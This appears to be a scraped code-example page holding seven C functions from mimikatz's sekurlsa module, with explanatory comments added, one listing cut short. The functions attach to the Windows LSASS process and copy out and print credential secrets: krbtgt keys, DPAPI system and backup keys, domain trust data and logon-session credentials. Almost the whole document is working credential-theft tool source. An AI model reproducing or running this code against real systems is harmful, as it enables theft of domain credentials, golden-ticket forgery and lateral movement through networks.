Esempio n. 1
/*
 * sekurlsa::krbtgt command handler.
 *
 * Attaches to LSASS with kuhl_m_sekurlsa_acquireLSA(). When the KDC service
 * module is loaded in the target, the SecDataReferences signature table is
 * used to locate the secret-data pointer table, a DUAL_KRBTGT is copied out
 * of LSASS memory and its current/previous entries are handed to
 * kuhl_m_sekurlsa_krbtgt_keys() for display.
 *
 * argc/argv are unused; they only satisfy the command-handler signature.
 * Returns the NTSTATUS of the LSASS acquisition. A failed search or copy is
 * silent (nothing is printed) and does not alter the returned status.
 */
NTSTATUS kuhl_m_sekurlsa_krbtgt(int argc, wchar_t * argv[])
{
	NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
	LONG slotIndex = 0;
	DUAL_KRBTGT keys = {NULL, NULL};
	KULL_M_MEMORY_HANDLE hOwnMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
	KULL_M_MEMORY_ADDRESS aRemote = {NULL, cLsass.hLsassMem};
	KULL_M_MEMORY_ADDRESS aKeys = {&keys, &hOwnMemory};
	BOOL found;

	if(!NT_SUCCESS(status))
		return status;

	if(!kuhl_m_sekurlsa_kdcsvc_package.Module.isPresent)
	{
		PRINT_ERROR(L"KDC service not in LSASS memory\n");
		return status;
	}

	/* slotIndex is passed by address to the search; presumably it is filled
	   by the matching signature entry — confirm in kuhl_m_sekurlsa_utils_search_generic */
	found = kuhl_m_sekurlsa_utils_search_generic(&cLsass, &kuhl_m_sekurlsa_kdcsvc_package.Module, SecDataReferences, ARRAYSIZE(SecDataReferences), &aRemote.address, NULL, NULL, &slotIndex);
	if(found)
	{
		/* advance by slotIndex pointer-sized slots from the located address */
		aRemote.address = (PBYTE) aRemote.address + sizeof(PVOID) * slotIndex;
		if(kull_m_memory_copy(&aKeys, &aRemote, sizeof(DUAL_KRBTGT)))
		{
			kuhl_m_sekurlsa_krbtgt_keys(keys.krbtgt_current, L"Current");
			kuhl_m_sekurlsa_krbtgt_keys(keys.krbtgt_previous, L"Previous");
		}
	}
	return status;
}
Esempio n. 2
/*
 * sekurlsa::dpapisystem command handler.
 *
 * Selects the DPAPI package that holds the system credentials for the
 * target build (service module on Windows 8+, LSA module before), resolves
 * the "initialised" flag and the two SHA-sized credential buffers through
 * the SysCredReferences signature table, copies them out of LSASS and
 * prints them (concatenated, then machine / user separately).
 *
 * argc/argv are unused; they only satisfy the command-handler signature.
 * Returns the NTSTATUS of kuhl_m_sekurlsa_acquireLSA(); every later failure
 * simply ends the command without changing the status.
 */
NTSTATUS kuhl_m_sekurlsa_dpapi_system(int argc, wchar_t * argv[])
{
	NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
	KULL_M_MEMORY_HANDLE hOwnMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
	KULL_M_MEMORY_ADDRESS aRemote = {NULL, cLsass.hLsassMem};
	KULL_M_MEMORY_ADDRESS aLocalBuf = {NULL, &hOwnMemory};
	PKUHL_M_SEKURLSA_PACKAGE pPackage;
	PVOID pInitFlag = NULL, pMachineHash = NULL, pUserHash = NULL;
	BOOL initialized;
	BYTE savedInit, machineCred[SHA_DIGEST_LENGTH], userCred[SHA_DIGEST_LENGTH];

	if(!NT_SUCCESS(status))
		return status;

	/* Windows 8+ keeps the secrets in the DPAPI service module, older builds in the LSA one */
	pPackage = (cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8) ? &kuhl_m_sekurlsa_dpapi_svc_package : &kuhl_m_sekurlsa_dpapi_lsa_package;
	if(!pPackage->Module.isPresent)
	{
		PRINT_ERROR(L"DPAPI service not in LSASS memory\n");
		return status;
	}

	savedInit = pPackage->Module.isInit;
	if(!kuhl_m_sekurlsa_utils_search_generic(&cLsass, &pPackage->Module, SysCredReferences, ARRAYSIZE(SysCredReferences), &pInitFlag, &pMachineHash, &pUserHash, NULL))
		return status;
	/* author's note: "trick to use same packages as normal module." — the
	   pre-search isInit value is restored; presumably the search alters it */
	pPackage->Module.isInit = savedInit;

	/* 1. the BOOL telling whether the system credentials were ever set */
	aLocalBuf.address = &initialized;
	aRemote.address = pInitFlag;
	if(!kull_m_memory_copy(&aLocalBuf, &aRemote, sizeof(initialized)))
		return status;
	if(!initialized)
	{
		PRINT_ERROR(L"Not initialized!\n");
		return status;
	}

	kprintf(L"DPAPI_SYSTEM\n");

	/* 2. machine credential, then 3. user credential */
	aLocalBuf.address = machineCred;
	aRemote.address = pMachineHash;
	if(!kull_m_memory_copy(&aLocalBuf, &aRemote, sizeof(machineCred)))
		return status;
	aLocalBuf.address = userCred;
	aRemote.address = pUserHash;
	if(!kull_m_memory_copy(&aLocalBuf, &aRemote, sizeof(userCred)))
		return status;

	/* same bytes twice: once as one blob, once split into machine / user */
	kprintf(L"full: ");
	kull_m_string_wprintf_hex(machineCred, sizeof(machineCred), 0);
	kull_m_string_wprintf_hex(userCred, sizeof(userCred), 0);
	kprintf(L"\nm/u : ");
	kull_m_string_wprintf_hex(machineCred, sizeof(machineCred), 0);
	kprintf(L" / ");
	kull_m_string_wprintf_hex(userCred, sizeof(userCred), 0);
	kprintf(L"\n");
	return status;
}
Esempio n. 3
/*
 * sekurlsa::backupkeys command handler.
 *
 * Picks the DPAPI module that carries the backup keys for the target build
 * (service module on Windows 8+, LSA module before) and, when it is loaded,
 * prints the "current" and "compatibility" preferred keys through
 * kuhl_m_sekurlsa_bkey(), using the BackupKeyReferences and
 * BackupKeyReferencesCompat signature tables respectively.
 *
 * export : TRUE when the command line carries an "export" argument
 *          (kull_m_string_args_byName); forwarded to kuhl_m_sekurlsa_bkey.
 *
 * NOTE(review): the listing is cut after the if-block below — the function's
 * return statement and closing brace are not shown here.
 */
NTSTATUS kuhl_m_sekurlsa_bkeys(int argc, wchar_t * argv[])
{
	NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
	PKUHL_M_SEKURLSA_LIB pLib;
	BOOL export = kull_m_string_args_byName(argc, argv, L"export", NULL, NULL);

	if(NT_SUCCESS(status))
	{
		/* module selection depends on the build, as in kuhl_m_sekurlsa_dpapi_system */
		pLib = (cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8) ? &kuhl_m_sekurlsa_dpapi_svc_package.Module : &kuhl_m_sekurlsa_dpapi_lsa_package.Module;
		if(pLib->isPresent)
		{
			kprintf(L"\nCurrent prefered key:       ");
			kuhl_m_sekurlsa_bkey(&cLsass, pLib, BackupKeyReferences, ARRAYSIZE(BackupKeyReferences), export);
			kprintf(L"\nCompatibility prefered key: ");
			kuhl_m_sekurlsa_bkey(&cLsass, pLib, BackupKeyReferencesCompat, ARRAYSIZE(BackupKeyReferencesCompat), export);
		}
		/* no error is printed when the module is absent, unlike the sibling commands */
	}
Esempio n. 4
/*
 * sekurlsa::trust command handler.
 *
 * On builds >= KULL_M_WIN_BUILD_7 and with the KDC service module loaded,
 * locates the domain list head via the DomainListReferences signature table,
 * then walks the remote doubly-linked list: each KDC_DOMAIN_INFO is copied
 * out of LSASS and passed to kuhl_m_sekurlsa_trust_domaininfo() until the
 * cursor returns to the head address or a copy fails.
 *
 * argc/argv are unused; they only satisfy the command-handler signature.
 * Returns the NTSTATUS of kuhl_m_sekurlsa_acquireLSA(). The build check is
 * performed before the status check, so an unsupported build prints its
 * error regardless of whether LSASS was acquired.
 */
NTSTATUS kuhl_m_sekurlsa_trust(int argc, wchar_t * argv[])
{
	NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
	PVOID firstEntry;
	KDC_DOMAIN_INFO entry;
	KULL_M_MEMORY_HANDLE hOwnMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
	KULL_M_MEMORY_ADDRESS aListHead = {NULL, cLsass.hLsassMem};
	KULL_M_MEMORY_ADDRESS aCursor = {&firstEntry, &hOwnMemory};
	KULL_M_MEMORY_ADDRESS aEntry = {&entry, &hOwnMemory};

	if(cLsass.osContext.BuildNumber < KULL_M_WIN_BUILD_7)
	{
		PRINT_ERROR(L"Only for >= 2008r2\n");
		return status;
	}
	if(!NT_SUCCESS(status))
		return status;
	if(!kuhl_m_sekurlsa_kdcsvc_package.Module.isPresent)
	{
		PRINT_ERROR(L"KDC service not in LSASS memory\n");
		return status;
	}
	if(!kuhl_m_sekurlsa_utils_search_generic(&cLsass, &kuhl_m_sekurlsa_kdcsvc_package.Module, DomainListReferences, ARRAYSIZE(DomainListReferences), &aListHead.address, NULL, NULL, NULL))
		return status;

	/* read the pointer stored at the head: the first entry of the list */
	if(!kull_m_memory_copy(&aCursor, &aListHead, sizeof(PVOID)))
		return status;

	/* the cursor now designates remote memory; stop once it wraps back to the head */
	aCursor.address = firstEntry;
	aCursor.hMemory = cLsass.hLsassMem;
	while(aCursor.address != aListHead.address)
	{
		if(!kull_m_memory_copy(&aEntry, &aCursor, sizeof(KDC_DOMAIN_INFO)))
			break;
		kuhl_m_sekurlsa_trust_domaininfo(&entry);
		aCursor.address = entry.list.Flink;
	}
	return status;
}
Esempio n. 5
/*
 * Enumerates the LSASS logon sessions and invokes 'callback' once per
 * session with a KIWI_BASIC_SECURITY_LOGON_SESSION_DATA assembled from a
 * local copy of the remote session structure.
 *
 * callback      : receives the session data and pOptionalData; returning
 *                 FALSE stops the enumeration (see retCallback below).
 * pOptionalData : passed through to the callback untouched.
 *
 * Returns the NTSTATUS of kuhl_m_sekurlsa_acquireLSA(). Failures while
 * resolving the list count, allocating the scratch buffer or reading an
 * entry are not reflected in the returned status; they just end (or skip)
 * that part of the walk.
 */
NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalData)
{
	KIWI_BASIC_SECURITY_LOGON_SESSION_DATA sessionData;
	ULONG nbListes = 1, i; // number of session lists; stays 1 when LogonSessionListCount is not resolved
	PVOID pStruct;         // remote address of the first entry of the current list
	KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
	KULL_M_MEMORY_ADDRESS securityStruct, data = {&nbListes, &hLocalMemory}, aBuffer = {NULL, &hLocalMemory};
	BOOL retCallback = TRUE;
	const KUHL_M_SEKURLSA_ENUM_HELPER * helper; // per-build layout (struct size + field offsets) of the remote entry
	NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();

	if(NT_SUCCESS(status))
	{
		sessionData.cLsass = &cLsass;
		sessionData.lsassLocalHelper = lsassLocalHelper;

		// Layout table selection by build number. Index 4 is deliberately absent
		// from this chain; it is reached only through the helper++ below.
		if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_2K3)
			helper = &lsassEnumHelpers[0];
		else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_VISTA)
			helper = &lsassEnumHelpers[1];
		else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_7)
			helper = &lsassEnumHelpers[2];
		else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_8)
			helper = &lsassEnumHelpers[3];
		else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE)
			helper = &lsassEnumHelpers[5];
		else
			helper = &lsassEnumHelpers[6];

		// Windows 7 / 8 builds whose msv1_0 link timestamp is past 0x53480000 use the
		// next table entry ([4] after [3], [6] after [5]) — presumably a later
		// servicing change to the structure layout; confirm against lsassEnumHelpers.
		if((cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_7) && (cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE) && (kuhl_m_sekurlsa_msv_package.Module.Informations.TimeDateStamp > 0x53480000))
			helper++; // yeah, really, I do that =)

		securityStruct.hMemory = cLsass.hLsassMem;
		// Assignment inside the condition is intentional: when the count symbol was
		// resolved, read the ULONG it points to into nbListes (data still targets it).
		if(securityStruct.address = LogonSessionListCount)
			kull_m_memory_copy(&data, &securityStruct, sizeof(ULONG));

		for(i = 0; i < nbListes; i++)
		{
			securityStruct.address = &LogonSessionList[i]; // remote address of list head i
			// 'data' is redirected into LSASS memory inside the loop, so re-point it
			// at the local pStruct before reading the head pointer.
			data.address = &pStruct;
			data.hMemory = &hLocalMemory;
			// zero-initialised scratch copy of one remote entry; freed at the end of this iteration
			if(aBuffer.address = LocalAlloc(LPTR, helper->tailleStruct))
			{
				if(kull_m_memory_copy(&data, &securityStruct, sizeof(PVOID)))
				{
					data.address = pStruct;
					data.hMemory = securityStruct.hMemory;

					// circular list: stop when the cursor is back at the head, or when the callback asked to stop
					while((data.address != securityStruct.address) && retCallback)
					{
						if(kull_m_memory_copy(&aBuffer, &data, helper->tailleStruct))
						{
							// Field extraction at helper-provided offsets inside the local copy.
							// LogonId / UserName / LogonDomain / LogonServer point INTO aBuffer and are
							// only valid until it is freed below; the others are copied by value.
							sessionData.LogonId		= (PLUID)			((PBYTE) aBuffer.address + helper->offsetToLuid);
							sessionData.LogonType	= *((PULONG)		((PBYTE) aBuffer.address + helper->offsetToLogonType));
							sessionData.Session		= *((PULONG)		((PBYTE) aBuffer.address + helper->offsetToSession));
							sessionData.UserName	= (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToUsername);
							sessionData.LogonDomain	= (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToDomain);
							sessionData.pCredentials= *(PVOID *)		((PBYTE) aBuffer.address + helper->offsetToCredentials);
							sessionData.pSid		= *(PSID *)			((PBYTE) aBuffer.address + helper->offsetToPSid);
							sessionData.pCredentialManager = *(PVOID *) ((PBYTE) aBuffer.address + helper->offsetToCredentialManager);
							sessionData.LogonTime	= *((PFILETIME)		((PBYTE) aBuffer.address + helper->offsetToLogonTime));
							sessionData.LogonServer	= (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToLogonServer);

							// Presumably these replace the remote Buffer / SID pointers with LocalAlloc'd
							// copies read from LSASS — the LocalFree calls below rely on that; confirm in kull_m_string.
							kull_m_string_getUnicodeString(sessionData.UserName, cLsass.hLsassMem);
							kull_m_string_getUnicodeString(sessionData.LogonDomain, cLsass.hLsassMem);
							kull_m_string_getUnicodeString(sessionData.LogonServer, cLsass.hLsassMem);
							kull_m_string_getSid(&sessionData.pSid, cLsass.hLsassMem);

							retCallback = callback(&sessionData, pOptionalData);

							// release the per-entry copies before the next iteration overwrites aBuffer
							if(sessionData.UserName->Buffer)
								LocalFree(sessionData.UserName->Buffer);
							if(sessionData.LogonDomain->Buffer)
								LocalFree(sessionData.LogonDomain->Buffer);
							if(sessionData.LogonServer->Buffer)
								LocalFree(sessionData.LogonServer->Buffer);
							if(sessionData.pSid)
								LocalFree(sessionData.pSid);

							// the entry starts with its LIST_ENTRY: follow Flink to the next remote entry
							data.address = ((PLIST_ENTRY) (aBuffer.address))->Flink;
						}
						else break;
					}
				}
				LocalFree(aBuffer.address);
			}
		}
	}
	return status;
}
Esempio n. 6
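/*
 * sekurlsa command that walks the LSASS address space with
 * kull_m_process_getMemoryInformations(), handing every region to
 * kuhl_m_sekurlsa_enum_range with hLsassMem as the callback context.
 *
 * argc/argv are unused; they only satisfy the command-handler signature.
 * Returns the NTSTATUS of kuhl_m_sekurlsa_acquireLSA(), like the other
 * sekurlsa commands, so a failed attach is reported to the caller instead
 * of being masked by an unconditional STATUS_SUCCESS.
 */
NTSTATUS kuhl_m_sekurlsa_strings(int argc, wchar_t * argv[])
{
	NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
	if(NT_SUCCESS(status))
		kull_m_process_getMemoryInformations(cLsass.hLsassMem, kuhl_m_sekurlsa_enum_range, (PVOID) cLsass.hLsassMem);
	return status;
}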
Esempio n. 7
/*
 * Enumerates the LSASS logon sessions and invokes 'callback' once per
 * session with a KIWI_BASIC_SECURITY_LOGON_SESSION_DATA assembled from a
 * local copy of the remote session structure. (Earlier variant of the
 * function above: version gating uses Major/Minor version, the layout
 * table has four entries, and fewer fields are extracted.)
 *
 * callback      : receives the session data and pOptionalData; returning
 *                 FALSE stops the enumeration (see retCallback below).
 * pOptionalData : passed through to the callback untouched.
 *
 * Returns the NTSTATUS of kuhl_m_sekurlsa_acquireLSA(). Failures while
 * resolving the list count, allocating the scratch buffer or reading an
 * entry are not reflected in the returned status.
 */
NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalData)
{
	KIWI_BASIC_SECURITY_LOGON_SESSION_DATA sessionData;
	ULONG nbListes = 0, i; // number of session lists; set from LSASS or forced to 1 below
	PVOID pStruct;         // remote address of the first entry of the current list
	KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
	KULL_M_MEMORY_ADDRESS securityStruct, data = {&nbListes, &hLocalMemory}, aBuffer = {NULL, &hLocalMemory};
	BOOL retCallback = TRUE;
	const KUHL_M_SEKURLSA_ENUM_HELPER * helper; // per-OS-version layout (struct size + field offsets) of the remote entry
	NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();

	if(NT_SUCCESS(status))
	{
		sessionData.cLsass = &cLsass;
		sessionData.lsassLocalHelper = lsassLocalHelper;

		// Layout selection: pre-Vista (major < 6), then by minor version of the 6.x line
		if(cLsass.osContext.MajorVersion < 6)
			helper = &lsassEnumHelpers[0];
		else if(cLsass.osContext.MinorVersion < 2)
			helper = &lsassEnumHelpers[1];
		else if(cLsass.osContext.MinorVersion < 3)
			helper = &lsassEnumHelpers[2];
		else
			helper = &lsassEnumHelpers[3];

		securityStruct.hMemory = cLsass.hLsassMem;
		securityStruct.address = LogonSessionListCount;
		
		// data.address still points at nbListes here: either read the ULONG count
		// from LSASS, or assume a single list when the count symbol was not resolved.
		if(securityStruct.address)
			kull_m_memory_copy(&data, &securityStruct, sizeof(ULONG));
		else *(PULONG) data.address = 1;

		for(i = 0; i < nbListes; i++)
		{
			securityStruct.address = &LogonSessionList[i]; // remote address of list head i
			// 'data' is redirected into LSASS memory inside the loop, so re-point it
			// at the local pStruct before reading the head pointer.
			data.address = &pStruct;
			data.hMemory = &hLocalMemory;
			// zero-initialised scratch copy of one remote entry; freed at the end of this iteration
			if(aBuffer.address = LocalAlloc(LPTR, helper->tailleStruct))
			{
				if(kull_m_memory_copy(&data, &securityStruct, sizeof(PVOID)))
				{
					data.address = pStruct;
					data.hMemory = securityStruct.hMemory;

					// circular list: stop when the cursor is back at the head, or when the callback asked to stop
					while((data.address != securityStruct.address) && retCallback)
					{
						if(kull_m_memory_copy(&aBuffer, &data, helper->tailleStruct))
						{
							// Field extraction at helper-provided offsets inside the local copy.
							// LogonId / UserName / LogonDomain point INTO aBuffer and are only valid
							// until it is freed below; the others are copied by value.
							sessionData.LogonId		= (PLUID)			((PBYTE) aBuffer.address + helper->offsetToLuid);
							sessionData.LogonType	= *((PULONG)		((PBYTE) aBuffer.address + helper->offsetToLogonType));
							sessionData.Session		= *((PULONG)		((PBYTE) aBuffer.address + helper->offsetToSession));
							sessionData.UserName	= (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToUsername);
							sessionData.LogonDomain	= (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToDomain);
							sessionData.pCredentials= *(PVOID *)		((PBYTE) aBuffer.address + helper->offsetToCredentials);
							sessionData.pSid		= *(PSID *)			((PBYTE) aBuffer.address + helper->offsetToPSid);

							// Presumably these replace the remote Buffer / SID pointers with LocalAlloc'd
							// copies read from LSASS — the LocalFree calls below rely on that; confirm in the helpers.
							kull_m_string_getUnicodeString(sessionData.UserName, cLsass.hLsassMem);
							kull_m_string_getUnicodeString(sessionData.LogonDomain, cLsass.hLsassMem);
							kuhl_m_sekurlsa_utils_getSid(&sessionData.pSid, cLsass.hLsassMem);

							retCallback = callback(&sessionData, pOptionalData);

							// Released unconditionally here; the later variant above guards each
							// pointer for NULL first.
							LocalFree(sessionData.UserName->Buffer);
							LocalFree(sessionData.LogonDomain->Buffer);
							LocalFree(sessionData.pSid);

							// the entry starts with its LIST_ENTRY: follow Flink to the next remote entry
							data.address = ((PLIST_ENTRY) (aBuffer.address))->Flink;
						}
						else break;
					}
				}
				LocalFree(aBuffer.address);
			}
		}
	}
	return status;
}